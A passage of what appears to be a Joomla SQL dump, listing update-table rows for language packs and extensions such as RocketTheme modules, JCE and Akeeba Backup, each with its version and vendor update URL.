US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28265,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28266,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28267,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28268,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28269,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28270,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28271,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28272,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28273,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28274,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28275,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28276,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28277,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28278,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28279,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28280,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28281,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28282,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28283,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28284,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28285,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28286,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28287,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28288,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28289,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28290,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(28291,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(28292,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(28293,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(28294,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','http://updates.rockettheme.com/joomla/287/cb577720','',''),(28295,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(28296,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(28297,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(28298,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(28299,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(28300,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(28301,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28302,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28303,57,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28304,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28305,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28306,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28307,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28308,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28309,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28310,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28311,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28312,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28313,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28314,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28315,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28316,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28317,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28318,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28319,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28320,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28321,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28322,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28323,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28324,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28325,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28326,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28327,57,0,'English US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28328,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28329,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28330,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28331,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28332,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28333,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28334,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28335,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28336,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28337,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28338,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28339,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28340,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28341,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28342,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28343,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28344,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28345,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28346,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28347,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28348,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28349,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28350,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28351,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28352,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28353,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28354,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.6','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-6			\n		',''),(28355,129,0,'JCE 2.9.5','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.5','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-5-released',''),(28356,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28357,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28358,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28359,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28360,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28361,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28362,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28363,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28364,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28365,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28366,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28367,3,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28368,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28369,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28370,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28371,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28372,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28373,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28374,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28375,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28376,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28377,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28378,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28379,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28380,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28381,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28382,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28383,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28384,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28385,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28386,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28387,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28388,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28389,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28390,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28391,3,0,'English US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28392,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28393,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28394,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28395,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28396,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28397,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28398,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28399,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28400,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28401,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28402,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28403,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28404,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28405,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28406,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28407,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28408,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28409,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28410,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28411,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28412,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28413,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28414,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28415,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28416,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28417,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(28418,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(28419,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(28420,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(28421,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','http://updates.rockettheme.com/joomla/287/cb577720','',''),(28422,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(28423,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(28424,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(28425,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(28426,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(28427,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(28428,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28429,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28430,57,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28431,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28432,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28433,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28434,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28435,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28436,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28437,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28438,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28439,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28440,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28441,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28442,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28443,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28444,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28445,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28446,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28447,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28448,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28449,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28450,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28451,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28452,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28453,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28454,57,0,'English US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28455,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28456,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28457,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28458,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28459,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28460,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28461,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28462,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28463,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28464,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28465,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28466,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28467,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28468,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28469,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28470,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28471,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28472,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28473,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28474,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28475,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28476,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28477,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28478,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28479,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28480,67,0,'Akeeba Backup Core 